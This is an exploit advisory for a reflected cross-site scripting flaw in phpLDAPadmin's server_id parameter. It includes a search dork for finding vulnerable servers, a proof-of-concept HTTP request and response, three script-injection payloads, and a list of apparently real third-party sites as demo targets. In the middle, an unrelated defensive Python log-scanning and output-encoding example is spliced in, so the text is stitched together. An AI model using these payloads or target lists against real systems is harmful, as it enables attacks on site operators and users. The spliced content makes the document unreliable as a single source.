
phpLDAPadmin Cross-site scripting (XSS)

Author: Rednofozi , Published: 27-09-2018
 ,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
====================================================================================
# Exploit Title: phpLDAPadmin Cross-site scripting (XSS)
# Exploit Author: Rednofozi
# Date: 26-09-2018
# Email: Rednofozi@yahoo.com
# Vendor Homepage: webmail.math.cnrs.fr/
# OUR SITE : https://anonysec.org/
|====================================================================================
# {INFO}
# Reflected XSS (cross-site scripting) vulnerability in the server_id parameter
|====================================================================================
# {DORK}
# inurl:"admin.php?server_id="
|====================================================================================
# {POC}
#
GET /admin.php?server_id=%22%3E%3Cscript%3Ealert(%22Rednofozi]%22)%3C/script%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=l89iuld37adri6s9krvum4n7q0
Connection: keep-alive
Upgrade-Insecure-Requests: 1

# Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2554
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=5, max=100
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding: gzip



Parameter: server_id (reflected, GET)

Location: admin.php

Payloads:
server_id="><script>alert("Rednofozi:]")</script>
Or
server_id="><iframe/src=javascript:confirm(2)>X
Or
server_id="/><svg/onload=prompt(1)>

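For defenders, the useful takeaways from the payloads above are (a) what the attack looks like in an access log and (b) why output encoding and input validation stop it. The following is an added example, not code from this advisory or from phpLDAPadmin: it parses constructed Apache combined-format log lines, flags any request whose server_id is not the integer index phpLDAPadmin expects (after a second URL-decode pass to catch double-encoded values), and shows the value as it would appear once HTML-encoded for reflection. The log lines, IPs and the helper names are assumptions made for this example.

```python
"""Detection and output-encoding helpers for the reflected server_id XSS
described above. Added example, not phpLDAPadmin code; the access-log
lines below are constructed for illustration."""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines: one benign request and two
# carrying the payload shapes listed above against admin.php and cmd.php.
ACCESS_LOG = [
    '10.0.0.5 - - [27/Sep/2018:10:00:01 +0000] "GET /admin.php?server_id=0 HTTP/1.1" 200 2554 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Sep/2018:10:00:07 +0000] "GET /admin.php?server_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2554 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Sep/2018:10:00:09 +0000] "GET /cmd.php?cmd=login_form&server_id=%22%2F%3E%3Csvg%2Fonload%3Dprompt(1)%3E HTTP/1.1" 200 2600 "-" "Mozilla/5.0"',
]

# Client IP, timestamp, method and request target from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def extract_server_id(request_target: str) -> list:
    """Return every server_id value in the query string, URL-decoded once."""
    query = urlsplit(request_target).query
    return parse_qs(query, keep_blank_values=True).get("server_id", [])


def is_suspicious(value: str) -> bool:
    """phpLDAPadmin's server_id is an integer index; anything else is flagged."""
    return not value.isdigit()


def scan_access_log(lines) -> list:
    """Return (client_ip, decoded_value) for each request whose server_id is non-numeric."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for raw in extract_server_id(m.group("target")):
            value = unquote(raw)  # second decode pass catches double-encoded payloads
            if is_suspicious(value):
                hits.append((m.group("ip"), value))
    return hits


def safe_reflect(value: str) -> str:
    """Output-encode a value before embedding it in HTML text or a quoted attribute."""
    return html.escape(value, quote=True)


def validate_server_id(value: str) -> int:
    """Input validation: accept only a non-negative integer index, else reject."""
    if not value.isdigit():
        raise ValueError("server_id must be a non-negative integer")
    return int(value)


if __name__ == "__main__":
    for ip, value in scan_access_log(ACCESS_LOG):
        print(f"{ip} sent non-numeric server_id: {value!r} -> encoded {safe_reflect(value)!r}")
```

Validation alone (rejecting anything but digits) is the cheapest fix for this parameter; the encoding helper is the general rule that makes any reflected value inert when validation is not possible. In a log review, the benign `server_id=0` request produces no hit, while both payload requests are attributed to the same client.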

#
#
|====================================================================================
# {DEMO}
# 01: https://webmail.math.cnrs.fr/admin/index.php?server_id=0
# 02: https://ldap.medialight.com/admin/cmd.php?cmd=login_form&server_id=1
# 03: https://admin.serconi.es/phpldapadmin/cmd.php?cmd=login_form&server_id=2
# 04:
# 05:
# 06:
# 07:
# 08:
# 09:
# 10:
|====================================================================================
# {TNX For}
# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
# >>> Discovered By :Rednofozi
|====================================================================================
The END ; Good Luck :D:D:D